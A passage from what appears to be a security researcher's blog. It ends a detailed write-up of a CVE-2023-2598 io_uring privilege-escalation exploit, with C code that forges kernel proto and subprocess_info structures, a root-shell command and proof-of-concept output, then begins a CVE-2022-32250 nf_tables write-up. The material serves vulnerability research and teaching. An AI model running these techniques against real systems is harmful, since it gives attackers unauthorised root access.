	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">setsockopt</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="n">sockptr_t</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*    72     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">getsockopt</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*    80     8 */</span>

	<span class="p">...</span>

	<span class="cm">/* size: 432, cachelines: 7, members: 54 */</span>
	<span class="cm">/* sum members: 425, holes: 2, sum holes: 7 */</span>
	<span class="cm">/* last cacheline: 48 bytes */</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Here we have quite a few candidates, but the one we are really interested in is <code class="language-plaintext highlighter-rouge">ioctl</code>. By writing our “gadget” to <code class="language-plaintext highlighter-rouge">ioctl</code> we will be able to invoke it simply by issuing an ioctl call on the socket.</p>

<p>However, in order to write our gadget at <code class="language-plaintext highlighter-rouge">proto-&gt;ioctl</code> we first need to set up a fake <code class="language-plaintext highlighter-rouge">proto</code> object. This is easy enough - we can write it below our <code class="language-plaintext highlighter-rouge">sock</code> object. To do this safely, we need to ensure that we aren’t overwriting anything right after the <code class="language-plaintext highlighter-rouge">sock</code> object that we shouldn’t be.</p>

<p>Making the sockets TCP sockets (<code class="language-plaintext highlighter-rouge">tcp_sock</code>), for example, gives us quite a bit of leeway.</p>

<h4 id="peeling-back-tcp_sock-">Peeling back tcp_sock <a name="tcp_sock"></a></h4>
<p><code class="language-plaintext highlighter-rouge">tcp_sock</code> is the top-level object.<br />
 <code class="language-plaintext highlighter-rouge">struct inet_connection_sock inet_conn</code> is the first member of <code class="language-plaintext highlighter-rouge">tcp_sock</code><br />
  <code class="language-plaintext highlighter-rouge">struct inet_sock icsk_inet</code> is the first member of <code class="language-plaintext highlighter-rouge">inet_connection_sock</code><br />
   <code class="language-plaintext highlighter-rouge">struct sock sk</code> is the first member of <code class="language-plaintext highlighter-rouge">inet_sock</code></p>

<p>So in memory, the objects are laid out the following way:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>--- sock @0
----- inet_sock 
------ inet_connection_sock 
------- tcp_sock @1400
</code></pre></div></div>
<p>In total <code class="language-plaintext highlighter-rouge">tcp_sock</code> is of size 2208 bytes (on v6.3-rc1).</p>

<p>We have the freedom to place our fake proto object below <code class="language-plaintext highlighter-rouge">sock</code> proper, writing over the <code class="language-plaintext highlighter-rouge">inet_sock</code>. After making our <code class="language-plaintext highlighter-rouge">ioctl</code> call, we only need to restore the <code class="language-plaintext highlighter-rouge">tcp_sock</code> to its initial state so as to not accidentally panic the kernel when the socket gets destroyed.</p>
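<p>The overwrite and the later restore can be sketched on a local copy of the object’s bytes, which would then be written back through the registered buffer. All sizes and offsets come from the layouts shown above. The function names are made up, and the sketch assumes that the kernel address of the object (<code class="language-plaintext highlighter-rouge">obj_kaddr</code>) is already known; obtaining it is outside the scope of this snippet.</p>

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Sizes and offsets taken from the pahole output above (v6.3-rc1 build). */
#define SOCK_SIZE       760   /* sizeof(struct sock) */
#define TCP_SOCK_SIZE   2208  /* sizeof(struct tcp_sock) */
#define SKC_PROT_OFF    40    /* sock->__sk_common.skc_prot */
#define PROTO_IOCTL_OFF 40    /* proto->ioctl */

/*
 * obj:       local, writable copy of the tcp_sock bytes
 * backup:    receives a pristine copy so the object can be restored later
 * obj_kaddr: kernel virtual address of the object (assumed to be known)
 * gadget:    kernel address to be called through proto->ioctl
 */
static void plant_fake_proto(uint8_t *obj, uint8_t *backup,
                             uint64_t obj_kaddr, uint64_t gadget)
{
    assert(obj != NULL && backup != NULL);

    /* Keep the original bytes around for the restore step. */
    memcpy(backup, obj, TCP_SOCK_SIZE);

    /* The fake proto starts right after struct sock, inside the inet_sock part. */
    uint64_t fake_proto_kaddr = obj_kaddr + SOCK_SIZE;

    /* fake_proto->ioctl = gadget */
    memcpy(obj + SOCK_SIZE + PROTO_IOCTL_OFF, &gadget, sizeof(gadget));
    /* sock->skc_prot = &fake_proto */
    memcpy(obj + SKC_PROT_OFF, &fake_proto_kaddr, sizeof(fake_proto_kaddr));
}

/* Put the object back into its initial state after the ioctl call. */
static void restore_object(uint8_t *obj, const uint8_t *backup)
{
    assert(obj != NULL && backup != NULL);
    memcpy(obj, backup, TCP_SOCK_SIZE);
}
```

<p>Only the <code class="language-plaintext highlighter-rouge">ioctl</code> slot of the fake <code class="language-plaintext highlighter-rouge">proto</code> is filled in here. Anything else the kernel reads through <code class="language-plaintext highlighter-rouge">skc_prot</code> while the fake object is in place would see leftover <code class="language-plaintext highlighter-rouge">inet_sock</code> bytes, which is one more reason to keep that window short and restore promptly.</p>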

<h4 id="call_usermodehelper_exec-">call_usermodehelper_exec <a name="call_usermodehelper_exec"></a></h4>
<p>A very clean gadget that we could use is <a href="https://elixir.bootlin.com/linux/v6.3-rc1/source/kernel/umh.c#L385">call_usermodehelper_exec</a>. It allows us to start a user-mode process from kernel space. It takes two arguments - <code class="language-plaintext highlighter-rouge">(struct subprocess_info *sub_info, int wait)</code>.</p>

<p>Looking at <code class="language-plaintext highlighter-rouge">struct proto</code> we can see that the ioctl is defined as <code class="language-plaintext highlighter-rouge">(*ioctl)(struct sock *, int, long unsigned int);</code>. We cannot control <code class="language-plaintext highlighter-rouge">sub_info</code> - it will always be a pointer to our <code class="language-plaintext highlighter-rouge">sock</code> object.</p>

<p>So now the question is - are we able to write a fake <code class="language-plaintext highlighter-rouge">subprocess_info</code> object over the beginning of our socket without breaking it?</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">subprocess_info</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">work_struct</span>         <span class="n">work</span><span class="p">;</span>                 <span class="cm">/*     0    32 */</span>
	<span class="k">struct</span> <span class="n">completion</span> <span class="o">*</span>        <span class="n">complete</span><span class="p">;</span>             <span class="cm">/*    32     8 */</span>
	<span class="k">const</span> <span class="kt">char</span>  <span class="o">*</span>              <span class="n">path</span><span class="p">;</span>                 <span class="cm">/*    40     8 */</span>
	<span class="kt">char</span> <span class="o">*</span> <span class="o">*</span>                   <span class="n">argv</span><span class="p">;</span>                 <span class="cm">/*    48     8 */</span>
	<span class="kt">char</span> <span class="o">*</span> <span class="o">*</span>                   <span class="n">envp</span><span class="p">;</span>                 <span class="cm">/*    56     8 */</span>
	<span class="cm">/* --- cacheline 1 boundary (64 bytes) --- */</span>
	<span class="kt">int</span>                        <span class="n">wait</span><span class="p">;</span>                 <span class="cm">/*    64     4 */</span>
	<span class="kt">int</span>                        <span class="n">retval</span><span class="p">;</span>               <span class="cm">/*    68     4 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">init</span><span class="p">)(</span><span class="k">struct</span> <span class="n">subprocess_info</span> <span class="o">*</span><span class="p">,</span> <span class="k">struct</span> <span class="n">cred</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*    72     8 */</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">cleanup</span><span class="p">)(</span><span class="k">struct</span> <span class="n">subprocess_info</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*    80     8 */</span>
	<span class="kt">void</span> <span class="o">*</span>                     <span class="n">data</span><span class="p">;</span>                 <span class="cm">/*    88     8 */</span>

	<span class="cm">/* size: 96, cachelines: 2, members: 10 */</span>
	<span class="cm">/* last cacheline: 32 bytes */</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The first member of <code class="language-plaintext highlighter-rouge">subprocess_info</code> is a <a href="https://elixir.bootlin.com/linux/v6.3-rc1/source/include/linux/workqueue.h#L97">work_struct</a> - an object that describes <em>deferred work</em>. Then we have parameters like <code class="language-plaintext highlighter-rouge">path</code> which holds a pointer to the path of our executable, <code class="language-plaintext highlighter-rouge">argv</code> which is a pointer to the array of pointers to each of the arguments and <code class="language-plaintext highlighter-rouge">envp</code> which is the same but for environment variables. The function pointer <code class="language-plaintext highlighter-rouge">init</code> holds the function that will be called on initialization to set up the credentials of the process - if it is set to null, it will start with the credentials of system workqueues (as root). Likewise, if <code class="language-plaintext highlighter-rouge">cleanup</code> is set, it gets executed after the subprocess exits.</p>

<h4 id="overlapping-subprocess_info-">Overlapping subprocess_info <a name="overlap_subprocess_info"></a></h4>
<p>As we established, our <code class="language-plaintext highlighter-rouge">subprocess_info</code> will need to overlap with the start of the <code class="language-plaintext highlighter-rouge">sock</code> object as the first argument of the <code class="language-plaintext highlighter-rouge">ioctl</code> is <code class="language-plaintext highlighter-rouge">sock *</code>. However, the first 136 bytes of <code class="language-plaintext highlighter-rouge">struct sock</code> are occupied by <code class="language-plaintext highlighter-rouge">struct sock_common</code>.</p>

<pre><code class="language-txt">struct sock[sock_common]      | subprocess_info
============================================================
0x0: skc_addrpair             | work.data
0x8: skc_hash, skc_u16hashes  | work.entry.next
0x10: skc_portpair, ..., ...  | work.entry.prev
0x18: skc_bind_node[0:7]      | work.func
0x20: skc_bind_node[8:15]     | complete
0x28: skc_prot (struct proto) | path
0x30: skc_net                 | argv
0x38: skc_v6_daddr[0:7]       | envp
0x40: skc_v6_daddr[8:15]      | wait, retval
0x48: skc_v6_rcv_saddr[0:7]   | *init
0x50: skc_v6_rcv_saddr[8:15]  | *cleanup
0x58: skc_cookie              | data
============================================================
</code></pre>
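
<p>The right-hand column of the table can be reproduced with <code class="language-plaintext highlighter-rouge">offsetof</code>. This is only a sketch: the <code class="language-plaintext highlighter-rouge">mock_*</code> types are hypothetical copies of the layout listed above, a 64-bit (LP64) target is assumed, and <code class="language-plaintext highlighter-rouge">SKC_PROT_OFFSET</code> is simply the <code class="language-plaintext highlighter-rouge">0x28</code> taken from the table.</p>
<pre><code class="language-c">#include &lt;stddef.h&gt;

/* Mock of work_struct as listed in the table: data, entry.next, entry.prev, func. */
struct mock_list_head { struct mock_list_head *next, *prev; };
struct mock_work_struct {
    unsigned long data;
    struct mock_list_head entry;
    void (*func)(struct mock_work_struct *);
};

/* Mock of subprocess_info with the same member order as the listing above. */
struct mock_subprocess_info {
    struct mock_work_struct work;
    void *complete;
    const char *path;
    char **argv;
    char **envp;
    int wait;
    int retval;
    int (*init)(struct mock_subprocess_info *, void *);
    void (*cleanup)(struct mock_subprocess_info *);
    void *data;
};

/* Offset of skc_prot inside sock_common, as given in the table. */
#define SKC_PROT_OFFSET 0x28

/* Returns 1 when path lands exactly on top of skc_prot (LP64 assumed). */
int path_overlaps_skc_prot(void)
{
    return offsetof(struct mock_subprocess_info, path) == SKC_PROT_OFFSET;
}
</code></pre>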

<p>As we see, <code class="language-plaintext highlighter-rouge">skc_prot</code> overlaps with <code class="language-plaintext highlighter-rouge">path</code>. If we set <code class="language-plaintext highlighter-rouge">path</code> to anything else, we will be overwriting <code class="language-plaintext highlighter-rouge">skc_prot</code>, which will break our exploit as we need <code class="language-plaintext highlighter-rouge">skc_prot</code> to point to our fake <code class="language-plaintext highlighter-rouge">proto</code> structure at the end of <code class="language-plaintext highlighter-rouge">sock</code> proper. So, can we overlap <code class="language-plaintext highlighter-rouge">path</code> with the start of our <code class="language-plaintext highlighter-rouge">proto</code> structure?</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">proto</span> <span class="p">{</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">close</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">long</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*     0     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">pre_connect</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*     8     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">connect</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*    16     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">disconnect</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*    24     8 */</span>
	<span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span>              <span class="p">(</span><span class="o">*</span><span class="n">accept</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="p">,</span> <span class="n">bool</span><span class="p">);</span> <span class="cm">/*    32     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">ioctl</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">long</span> <span class="kt">unsigned</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*    40     8 */</span>
	<span class="p">...</span>
<span class="p">};</span>
</code></pre></div></div>
<p>The only value in <code class="language-plaintext highlighter-rouge">proto</code> we need to keep is <code class="language-plaintext highlighter-rouge">ioctl</code> as it holds <code class="language-plaintext highlighter-rouge">call_usermodehelper_exec</code>. We don’t care about all other values as we won’t be connecting, disconnecting or closing the socket - so we can freely write over those members. This leaves us with 40 bytes free at the start of <code class="language-plaintext highlighter-rouge">proto</code> for our path. More than enough :)</p>
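
<p>As a rough sketch of that idea, the helper below builds the first 48 bytes of a fake <code class="language-plaintext highlighter-rouge">proto</code> in a plain userspace buffer: the path string goes into the bytes before <code class="language-plaintext highlighter-rouge">ioctl</code> and the gadget address goes into the <code class="language-plaintext highlighter-rouge">ioctl</code> slot. The function name, the buffer and the gadget value are hypothetical; only the offset 40 comes from the listing above.</p>
<pre><code class="language-c">#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

#define PROTO_IOCTL_OFFSET 40  /* offset of ioctl in struct proto, per the listing above */

/* Fills a fake proto image: the path string occupies the bytes before ioctl,
 * the gadget address occupies the ioctl slot.
 * Returns 0 on success, -1 if the path (with its NUL) or the image does not fit. */
int build_fake_proto(uint8_t *image, size_t image_len,
                     const char *path, uint64_t gadget_addr)
{
    size_t path_len = strlen(path) + 1;

    if (path_len &gt; PROTO_IOCTL_OFFSET ||
        image_len &lt; PROTO_IOCTL_OFFSET + sizeof(gadget_addr))
        return -1;

    memset(image, 0, image_len);
    memcpy(image, path, path_len);
    memcpy(image + PROTO_IOCTL_OFFSET, &amp;gadget_addr, sizeof(gadget_addr));
    return 0;
}
</code></pre>
<p>The length check is the whole point: <code class="language-plaintext highlighter-rouge">/bin/sh</code> needs 8 bytes including the terminator, so it fits comfortably in front of <code class="language-plaintext highlighter-rouge">ioctl</code>.</p>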

<h4 id="setting-up-the-arguments-">Setting up the arguments <a name="arguments"></a></h4>
<p>We also need to set up our arguments for <code class="language-plaintext highlighter-rouge">subprocess_info</code>. Our goal is to execute something like <code class="language-plaintext highlighter-rouge">/bin/sh -c /bin/sh &amp;&gt;/dev/ttyS0 &lt;/dev/ttyS0</code>. Let’s break it down.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/bin/sh -c /bin/sh &amp;&gt;/dev/ttyS0 &lt;/dev/ttyS0
 ^      ^  |______________________________|	
 |      |               |
 |      |               |
path   arg1            arg2
arg0	
</code></pre></div></div>
<p>We are essentially asking <code class="language-plaintext highlighter-rouge">/bin/sh</code> to spawn us another <code class="language-plaintext highlighter-rouge">/bin/sh</code> process but we redirect its <code class="language-plaintext highlighter-rouge">stdin</code> and <code class="language-plaintext highlighter-rouge">stdout</code> to our virtual console/serial port.</p>

<p>However, all of those strings need to go somewhere. We already established that <code class="language-plaintext highlighter-rouge">path</code> will need to go at the start of <code class="language-plaintext highlighter-rouge">proto</code> but there isn’t enough space there for all of those strings. A convenient location for them is overlapping with <code class="language-plaintext highlighter-rouge">inet_sock / inet_connection_sock / tcp_sock</code> after <code class="language-plaintext highlighter-rouge">sock</code> proper. There we can write both the strings and the <code class="language-plaintext highlighter-rouge">argv</code> array of pointers.</p>

<p>This, though, presents another problem. In order to set up <code class="language-plaintext highlighter-rouge">argv</code> we need to know the addresses in memory of all the arguments we set up. So aside from KASLR, we need to also leak the address of our <code class="language-plaintext highlighter-rouge">sock</code> object in memory so we can calculate the location at which our arguments are.</p>

<p>Two members in <code class="language-plaintext highlighter-rouge">sock</code> from which we can obtain a <em>self-pointer</em> are <code class="language-plaintext highlighter-rouge">sk_error_queue</code> and <code class="language-plaintext highlighter-rouge">sk_receive_queue</code> - both are heads of doubly linked lists. Both lists <em>should</em> be empty, so each head should contain pointers to itself. It should be said that while I observed that both lists were empty, the documentation describes <code class="language-plaintext highlighter-rouge">sk_error_queue</code> as “rarely used” - so it is the wiser choice for the leak.</p>

<p>After obtaining the address of our <code class="language-plaintext highlighter-rouge">sock</code> structure in memory, the rest is just a simple matter of calculating offsets.</p>
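
<p>The offset arithmetic could look roughly like the sketch below. Both helpers are hypothetical, and the offset of the queue head inside <code class="language-plaintext highlighter-rouge">sock</code> is passed in as a parameter because it depends on the kernel build. The sketch assumes the leaked value is the <code class="language-plaintext highlighter-rouge">next</code> pointer of an empty queue head, which points back at the head itself.</p>
<pre><code class="language-c">#include &lt;stdint.h&gt;

/* An empty list head points to itself, so the leaked next pointer is the
 * address of the queue head; subtracting its offset yields the sock base. */
uint64_t sock_base_from_leak(uint64_t leaked_next, uint64_t queue_offset)
{
    return leaked_next - queue_offset;
}

/* Writes the three argv pointers plus the NULL terminator.
 * arg_offsets[i] is where string i was placed, relative to the sock base. */
void build_argv(uint64_t argv_out[4], uint64_t sock_base,
                const uint64_t arg_offsets[3])
{
    for (int i = 0; i &lt; 3; i++)
        argv_out[i] = sock_base + arg_offsets[i];
    argv_out[3] = 0;
}
</code></pre>
<p>The resulting four 64-bit values are what gets written at the location we later point <code class="language-plaintext highlighter-rouge">argv</code> to.</p>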

<h4 id="setting-up-subprocess_info-">Setting up subprocess_info <a name="subprocess_info"></a></h4>
<p>Let’s see how we are going to set the <code class="language-plaintext highlighter-rouge">subprocess_info</code> to escalate.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>work.data          &lt;-&gt; set to 0
work.entry.next    &lt;-&gt; set to its own address
work.entry.prev    &lt;-&gt; set to the address of work.entry.next
work.func          &lt;-&gt; set to call_usermodehelper_exec_work
complete           &lt;-&gt; irrelevant
path               &lt;-&gt; don't overwrite or overwrite it with the same value
argv               &lt;-&gt; write the address where the argv array was set up
envp               &lt;-&gt; set to 0, we have no env variables
wait               &lt;-&gt; irrelevant
retval             &lt;-&gt; irrelevant
*init              &lt;-&gt; set to 0
*cleanup           &lt;-&gt; set to 0
data               &lt;-&gt; irrelevant
</code></pre></div></div>
<p>We must write <code class="language-plaintext highlighter-rouge">work.func</code> to hold <code class="language-plaintext highlighter-rouge">call_usermodehelper_exec_work</code>. As you remember, we set <code class="language-plaintext highlighter-rouge">proto-&gt;ioctl</code> to <code class="language-plaintext highlighter-rouge">call_usermodehelper_exec</code>. The function <code class="language-plaintext highlighter-rouge">call_usermodehelper_exec</code> is responsible for queuing up our deferred work, while <code class="language-plaintext highlighter-rouge">call_usermodehelper_exec_work</code> is called to handle the deferred work when its time comes - so <code class="language-plaintext highlighter-rouge">call_usermodehelper_exec_work</code> is the one that actually spawns our new process.</p>

<p>We write <code class="language-plaintext highlighter-rouge">path</code> to remain the same, the address of our <code class="language-plaintext highlighter-rouge">proto</code> structure.</p>
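
<p>Put together, the table above could be applied to a copy of the first 96 bytes of the socket roughly like this. It is a sketch with hypothetical names: the image is treated as twelve 64-bit slots (one per row, with <code class="language-plaintext highlighter-rouge">wait</code> and <code class="language-plaintext highlighter-rouge">retval</code> sharing a slot), a 64-bit target is assumed, and the addresses are supplied by the caller.</p>
<pre><code class="language-c">#include &lt;stdint.h&gt;

/* One 64-bit slot per row of the table above. */
enum {
    SLOT_WORK_DATA, SLOT_ENTRY_NEXT, SLOT_ENTRY_PREV, SLOT_WORK_FUNC,
    SLOT_COMPLETE, SLOT_PATH, SLOT_ARGV, SLOT_ENVP, SLOT_WAIT_RETVAL,
    SLOT_INIT, SLOT_CLEANUP, SLOT_DATA, SLOT_COUNT
};

/* img holds the current first 96 bytes of the sock; only the slots that the
 * table marks as "set" are changed, everything else is left as it was. */
void fill_subprocess_info(uint64_t img[SLOT_COUNT], uint64_t sock_base,
                          uint64_t exec_work_addr, uint64_t argv_addr)
{
    /* Kernel address of work.entry, i.e. of work.entry.next. */
    uint64_t entry_addr = sock_base + SLOT_ENTRY_NEXT * sizeof(uint64_t);

    img[SLOT_WORK_DATA]  = 0;
    img[SLOT_ENTRY_NEXT] = entry_addr;     /* empty list: next points at itself */
    img[SLOT_ENTRY_PREV] = entry_addr;     /* prev points at the same node */
    img[SLOT_WORK_FUNC]  = exec_work_addr; /* call_usermodehelper_exec_work */
    /* SLOT_PATH is deliberately untouched: it doubles as skc_prot. */
    img[SLOT_ARGV]       = argv_addr;
    img[SLOT_ENVP]       = 0;
    img[SLOT_INIT]       = 0;
    img[SLOT_CLEANUP]    = 0;
}
</code></pre>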

<p>After this is done, making an <code class="language-plaintext highlighter-rouge">ioctl</code> call to our socket to spawn our new shell is all that is left :)</p>

<h3 id="proof-of-concept-">Proof of Concept <a name="poc"></a></h3>
<p>Due to the astonishing primitive that this vulnerability gives us, the proof of concept is <em>extremely</em> reliable by nature.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
$ ./exploit
[*] CVE-2023-2598 Exploit by anatomic (@YordanStoychev)
memfd: 0, page: 0 at virt_addr: 0x4247000000, reading 266240000 bytes
memfd: 0, page: 500 at virt_addr: 0x42470001f4, reading 266240000 bytes
memfd: 0, page: 1000 at virt_addr: 0x42470003e8, reading 266240000 bytes
memfd: 0, page: 1500 at virt_addr: 0x42470005dc, reading 266240000 bytes
memfd: 0, page: 2000 at virt_addr: 0x42470007d0, reading 266240000 bytes
memfd: 0, page: 2500 at virt_addr: 0x42470009c4, reading 266240000 bytes
memfd: 0, page: 3000 at virt_addr: 0x4247000bb8, reading 266240000 bytes
memfd: 0, page: 3500 at virt_addr: 0x4247000dac, reading 266240000 bytes
memfd: 0, page: 4000 at virt_addr: 0x4247000fa0, reading 266240000 bytes
memfd: 0, page: 4500 at virt_addr: 0x4247001194, reading 266240000 bytes
memfd: 0, page: 5000 at virt_addr: 0x4247001388, reading 266240000 bytes
memfd: 0, page: 5500 at virt_addr: 0x424700157c, reading 266240000 bytes
memfd: 0, page: 6000 at virt_addr: 0x4247001770, reading 266240000 bytes
memfd: 0, page: 6500 at virt_addr: 0x4247001964, reading 266240000 bytes
memfd: 0, page: 7000 at virt_addr: 0x4247001b58, reading 266240000 bytes
memfd: 0, page: 7500 at virt_addr: 0x4247001d4c, reading 266240000 bytes
memfd: 0, page: 8000 at virt_addr: 0x4247001f40, reading 266240000 bytes
memfd: 0, page: 8500 at virt_addr: 0x4247002134, reading 266240000 bytes
memfd: 0, page: 9000 at virt_addr: 0x4247002328, reading 266240000 bytes
memfd: 0, page: 9500 at virt_addr: 0x424700251c, reading 266240000 bytes
memfd: 0, page: 10000 at virt_addr: 0x4247002710, reading 266240000 bytes
memfd: 0, page: 10500 at virt_addr: 0x4247002904, reading 266240000 bytes
memfd: 0, page: 11000 at virt_addr: 0x4247002af8, reading 266240000 bytes
memfd: 0, page: 11500 at virt_addr: 0x4247002cec, reading 266240000 bytes
memfd: 0, page: 12000 at virt_addr: 0x4247002ee0, reading 266240000 bytes
memfd: 0, page: 12500 at virt_addr: 0x42470030d4, reading 266240000 bytes
Found value 0xdeadbeefdeadbeef at offset 0x21c8
Socket object starts at offset 0x2000
kaslr_leak: 0xffffffffb09503f0
kaslr_base: 0xffffffffafe00000
found socket is socket number 1950
our struct sock object starts at 0xffff9817ff400000
fake proto structure set up at 0xffff9817ff400578
args at 0xffff9817ff400728
argv at 0xffff9817ff400750
subprocess_info set up at beginning of sock at 0xffff9817ff400000
calling ioctl...
/bin/sh: can't access tty; job control turned off
/ # id
uid=0(root) gid=0(root)
/ # w00t w00t
</code></pre></div></div>
<p>You can find my Proof of Concept - <a href="https://github.com/ysanatomic/io_uring_LPE-CVE-2023-2598">here</a>.</p>

<h2 id="acknowledgements-">Acknowledgements <a name="acknowledgements"></a></h2>
<p><a href="https://tholl.xyz/">Tobias Holl</a>, for outstanding research, discovering the vulnerability and PoC’ing it. I took from him the idea of using the pacing rate of the socket as an egg :)</p>

<p><a href="https://chompie.rip/Home">Valentina Palmiotti (chompie)</a>, for her amazing introduction to the <code class="language-plaintext highlighter-rouge">io_uring</code> subsystem in her article, <a href="https://chompie.rip/Blog+Posts/Put+an+io_uring+on+it+-+Exploiting+the+Linux+Kernel#io_uring%20What%20is%20it?">Put an io_uring on it - Exploiting the Linux Kernel</a>.</p>]]></content><author><name></name></author><summary type="html"><![CDATA[A logic bug in io_uring leading to Local Privilege Escalation]]></summary></entry><entry><title type="html">Conquering a Use-After-Free in nf_tables: Detailed Analysis and Exploitation of CVE-2022-32250</title><link href="/cve-2022-32250/" rel="alternate" type="text/html" title="Conquering a Use-After-Free in nf_tables: Detailed Analysis and Exploitation of CVE-2022-32250" /><published>2023-02-04T14:00:00+00:00</published><updated>2023-02-04T14:00:00+00:00</updated><id>/cve-2022-32250</id><content type="html" xml:base="/cve-2022-32250/"><![CDATA[<h2 id="introduction">Introduction</h2>
<p>This article is a summary of the research I recently conducted on <code class="language-plaintext highlighter-rouge">CVE-2022-32250</code>. 
Some (but not all) of my analysis and the process of exploiting the vulnerability were done live and can be found <a href="https://www.youtube.com/watch?v=McaJoyoHWVA&amp;list=PLIT_LTJ-NAyevg0Rb_5iV6uN7KX6uhc-_">here</a>.</p>

<p>My research sprang from the <a href="https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/">write-up</a> by <a href="https://theori.io">theori.io</a>. I found their article extremely insightful and perfect for those who seek an overview of the vulnerability and the way it is exploited. Kudos to them!</p>

<p>In this write-up, I will be providing an in-depth look into the vulnerability and the way it is exploited.</p>

<p>As this is a Netfilter vulnerability I recommend reading my <a href="https://ysanatomic.github.io/netfilter_nf_tables/">article</a> that provides an introduction to the inner workings of <code class="language-plaintext highlighter-rouge">nf_tables</code>. However, I will try to cover everything you need to know.</p>

<h2 id="table-of-contents">Table of Contents</h2>
<ol>
  <li><a href="#background">Background</a>
    <ul>
      <li><a href="#sets">Sets</a></li>
      <li><a href="#lookup">Lookup Expression</a></li>
    </ul>
  </li>
  <li><a href="#vulnerability">The Vulnerability</a>
    <ul>
      <li><a href="#rootcause">Root Cause</a></li>
    </ul>
  </li>
  <li><a href="#exploitation">Exploitation</a>
    <ul>
      <li><a href="#requirements">Requirements</a></li>
      <li><a href="#heapaddr">Leaking a heap address</a>
        <ul>
          <li><a href="#heapaddrmethod">Method of Exploitation</a></li>
          <li><a href="#primitive">Searching for a primitive</a>
            <ul>
              <li><a href="#user_key_payload">struct user_key_payload</a></li>
            </ul>
          </li>
        </ul>
      </li>
      <li><a href="#defeatingkaslr">Defeating KASLR</a>
        <ul>
          <li><a href="#technique">Technique</a></li>
          <li><a href="#leaking">Leaking an address</a></li>
          <li><a href="#summarizingkaslr">Summarizing the KASLR leak process</a></li>
        </ul>
      </li>
      <li><a href="#escalating">Escalating via a modprobe_path overwrite</a>
        <ul>
          <li><a href="#escalatingmethod">Method of Exploitation</a></li>
          <li><a href="#overwritingmodprobe">Overwriting modprobe_path</a></li>
        </ul>
      </li>
    </ul>
  </li>
  <li><a href="#poc">Proof-of-Concept</a></li>
  <li><a href="#closing">Closing Remarks</a></li>
</ol>

<h2 id="background-">Background <a name="background"></a></h2>
<p>Before we take a look at the root cause we need to look at some background information that is needed to understand the vulnerability.</p>

<h3 id="sets-">Sets <a name="sets"></a></h3>
<p><code class="language-plaintext highlighter-rouge">nf_tables</code> makes use of so-called <strong>Sets</strong>. Their scope of use is vast, but if we <em>extremely</em> simplify and generalize them - they are a fancy key-value store that sometimes acts just as a list.</p>

<p>A quick example of set usage: imagine you have a list of ports (22, 80, 443). If you want to drop all packets that arrive on those ports, you would add the ports to a set and then use an <code class="language-plaintext highlighter-rouge">nft_lookup</code> expression to check whether the incoming packet’s port number is part of the set - and if so, drop it.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**
 * 	struct nft_set - nf_tables set instance
 *
 *	@list: table set list node
 *	@bindings: list of set bindings
 *	@table: table this set belongs to
 *	@net: netnamespace this set belongs to
 * 	@name: name of the set
 *	@handle: unique handle of the set
 * 	@ktype: key type (numeric type defined by userspace, not used in the kernel)
 * 	@dtype: data type (verdict or numeric type defined by userspace)
